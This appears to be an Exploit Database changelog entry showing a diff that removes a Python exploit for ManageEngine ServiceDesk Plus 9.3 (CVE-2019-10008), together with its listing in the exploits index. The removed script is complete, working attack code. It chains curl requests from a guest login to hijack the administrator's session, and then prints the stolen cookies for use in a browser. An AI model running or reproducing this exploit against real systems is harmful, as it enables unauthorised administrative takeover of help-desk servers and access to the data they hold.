DB: 2019-04-12

2 changes to exploits/shellcodes

Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation

exploits/windows/webapps/46659.py

@@ -1,180 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking
-# Date: 30-03-2019
-# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
-# Vendor: ManageEngine
-# Vendor Homepage: www.manageengine.com
-# Product: Service Desk Plus
-# Version: 9.3
-# Tested On: Windows 10 64 bit
-# CVE : 2019-10008
-
-
-# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
-# Low username and password is an account you have access to. high_username is account you want to authenticate as.
-
-# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
-# Run this script on a Linux OS.
-
-#Host ip address + port
-host="localhost:8080"
-
-#set to https if needed
-url = "http://" + host
-
-#Username with credentials you have
-low_username="guest"
-low_password="guest"
-
-#username you want to login as
-high_username="administrator"
-
-
-
-
-
-print("\033[1;37mUrl: \033[1;32m" + url)
-print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
-print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
-
-
-print("\033[1;32mGetting a session id\033[1;37m")
-
-# Get index page to capture a session id
-curl = "curl -i -s -k  -X $'GET' \
-    -H $'Host: "+host+"'  -H $'Referer: "+url+"/' -H $'Connection: close'\
-    $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-print("Sessid:")
-print(sessid)
-
-
-print("\033[1;31mLogging in with low privilege user\033[1;37m")
-
-
-#Attempt login post request 
-curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
- -H $'Referer: "+url+"/'\
- -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
- -b $'JSESSIONID="+sessid+"' \
- --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
- hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
- dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
- $'"+url+"/j_security_check'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-
-#Instead of following redirects with -L, following manually because we don't need all the transactions.
-curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
- -H $'Referer: "+url+"/'\
- -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
- -b $'JSESSIONID="+sessid+"' \
- $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
-sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-print(sessid)
-sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-print(sessidsso)
-grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
-
-grbl2 = []
-for cookie in grbl:
-	cl = cookie.split('=')
-	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
-
-		grbl2.append(cl[0])
-		grbl2.append(cl[1])
-
-curl = "curl -i -s -k -X $'GET' \
-    -H $'Host: "+host+"' \
-    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    $'"+url+"/mc/'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-print("\033[1;32mCaptured secondary sessid.\033[1;37m")
-print(sessid2)
-
-
-print("\033[1;31mDoing the magic step 1.\033[1;37m")
-curl = "curl -i -s -k -X $'GET' \
-    -H $'Host: "+host+"' \
-	-H $'Referer: "+url+"/mc/WOListView.do' \
-	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-	$'"+url+"/mc/jsp/MCLogOut.jsp'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-print("\033[1;31mDoing the magic step 2.\033[1;37m")
-
-
-
-
-curl = "curl -i -s -k -X $'GET' \
-    -H $'Host: "+host+"' \
-    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    $'"+url+"/mc/jsp/MCDashboard.jsp'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-
-
-curl = "curl -i -s -k -X $'GET' \
-    -H $'Host: "+host+"' \
-    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-
-curl = "curl -i -s -k -X $'POST' \
-    -H $'"+host+"' \
-    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
-    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
-    $'"+url+"/mc/j_security_check'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-curl = "curl -i -s -k -X $'GET' \
-    -H $'Host: "+host+"' \
-    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
-    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    -H $'Upgrade-Insecure-Requests: 1' \
-    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-    $'"+url+"/mc/jsp/MCDashboard.jsp'"
-
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-
-sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-
-print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
-print("JSESSIONID=" + sessidhigh)
-print("JSESSIONIDSSO=" + sessidssohigh)
-print(grbl2[0] + "=" + grbl2[1])
-print(grbl2[2] + "=" + grbl2[3])
-print("_rem=true")

files_exploits.csv

@@ -41112,7 +41112,6 @@ id,file,description,date,author,type,platform,port
 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
-46659,exploits/windows/webapps/46659.py,"Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,windows,
 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,
 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80
 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80